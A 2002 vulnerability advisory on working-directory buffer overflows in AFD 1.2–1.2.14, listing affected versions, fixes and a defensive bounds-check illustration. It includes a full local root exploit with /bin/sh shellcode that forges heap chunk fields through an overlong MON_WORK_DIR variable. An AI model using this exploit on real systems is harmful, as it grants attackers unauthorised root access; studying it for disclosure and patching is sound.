
Multiple AFD Working Directory Local Buffer Overflow Vulnerabilities


Published: 2002-09-11
Updated: 2002-09-11
Severity:
Threat level: local administrator (root) privileges
Error type: boundary check error
Exploitation: server mode

BUGTRAQ ID:5626

Affected systems
AFD AFD 1.2
AFD AFD 1.2.1
AFD AFD 1.2.2
AFD AFD 1.2.3
AFD AFD 1.2.4
AFD AFD 1.2.5
AFD AFD 1.2.6
AFD AFD 1.2.7
AFD AFD 1.2.8
AFD AFD 1.2.9
AFD AFD 1.2.10
AFD AFD 1.2.11
AFD AFD 1.2.12
AFD AFD 1.2.13
AFD AFD 1.2.14
Detailed description
AFD (Automatic File Distributor) contains multiple heap- and stack-based buffer overflows. All of them stem from missing bounds checks on the externally supplied working directory value, which an attacker can provide through an environment variable or on the command line.

Because several AFD programs are installed setuid root, a local attacker can exploit this to execute arbitrary code with root privileges.
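The missing bounds check described above, as an added illustration rather than AFD's own source: a hypothetical helper that copies the externally supplied working directory with strcpy, beside a hardened version that validates the value before copying it into a fixed buffer. WORK_DIR_MAX, the absolute-path requirement and the constructed oversized value are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WORK_DIR_MAX 1024  /* assumed destination buffer size; AFD's real constant may differ */

/* Vulnerable pattern (illustrative, not AFD's source): copies the external value
 * into a fixed buffer with no length check; a long value overruns the buffer. */
void copy_work_dir_unchecked(char *dest, const char *value)
{
    strcpy(dest, value);
}

/* Hardened replacement: validate, then copy a bounded number of bytes.
 * Returns 0 on success, -1 if the value is missing, not absolute, or too long. */
int copy_work_dir_checked(char *dest, size_t destlen, const char *value)
{
    if (value == NULL || value[0] != '/')
        return -1;
    size_t len = strnlen(value, destlen);
    if (len >= destlen)          /* no room left for the terminating NUL */
        return -1;
    memcpy(dest, value, len + 1);
    return 0;
}

/* Sets MON_WORK_DIR, reads it back through the checked path as a privileged
 * helper would, and reports 1 if the value was accepted, 0 if rejected. */
int value_accepted(const char *value)
{
    char work_dir[WORK_DIR_MAX];
    setenv("MON_WORK_DIR", value, 1);
    int ok = copy_work_dir_checked(work_dir, sizeof work_dir,
                                   getenv("MON_WORK_DIR")) == 0;
    unsetenv("MON_WORK_DIR");
    return ok;
}

/* Constructed input shaped like the advisory's trigger: an absolute path of
 * WORK_DIR_MAX + 100 bytes. Returns 1 if the checked path rejects it. */
int oversized_value_rejected(void)
{
    char value[WORK_DIR_MAX + 100];
    memset(value, 'A', sizeof value - 1);
    value[0] = '/';
    value[sizeof value - 1] = '\0';
    return !value_accepted(value);
}
```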

Test code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> /* execl */

char shellcode[] =
    "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */
    "--netric--"
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
    "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

int
main(int argc, char *argv[])
{
    char buffer[1135];

    unsigned int retloc = 0xbfffe360;
    unsigned int ret    = 0x0806f020; /* &shellcode */

    if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16);
    if (argc > 2) ret    = strtoul(argv[2], &argv[2], 16);

    memset(buffer, 0x41, sizeof(buffer));
    memcpy(buffer, "MON_WORK_DIR=", 13);
    memcpy(buffer + 13, shellcode, strlen(shellcode));

    buffer[1117] = 0xff; /* prev_size */
    buffer[1118] = 0xff;
    buffer[1119] = 0xff;
    buffer[1120] = 0xff;

    buffer[1121] = 0xfc; /* size field */
    buffer[1122] = 0xff;
    buffer[1123] = 0xff;
    buffer[1124] = 0xff;

    buffer[1126] = (retloc & 0x000000ff); /* FD */
    buffer[1127] = (retloc & 0x0000ff00) >> 8;
    buffer[1128] = (retloc & 0x00ff0000) >> 16;
    buffer[1129] = (retloc & 0xff000000) >> 24;

    buffer[1130] = (ret & 0x000000ff); /* BK */
    buffer[1131] = (ret & 0x0000ff00) >> 8;
    buffer[1132] = (ret & 0x00ff0000) >> 16;
    buffer[1133] = (ret & 0xff000000) >> 24;

    buffer[1134] = 0x0;
    putenv(buffer);

    fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n");
    fprintf(stdout, "-----------------------------------------------------------------\n");
    fprintf(stdout, "Ret    = 0x%08x\n", ret);
    fprintf(stdout, "Retloc = 0x%08x\n", retloc);

    execl("/bin/mon_ctrl", "mon_ctrl", NULL);
    return 0;
}

Solution
Upgrade:

AFD 1.2, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13 and 1.2.14:

AFD Upgrade src-1.2.15.tar.gz
http://www.dwd.de/AFD/download/src-1.2.15.tar.gz

AFD Patch patch-1.2.15.bz2
ftp://ftp.dwd.de/pub/afd/patch-1.2.15.bz2
Source code patch.

Related information
Netric Security Team.
Reference: http://online.securityfocus.com/archive/1/290349
Related homepage: http://www.dwd.de/AFD/english/index.html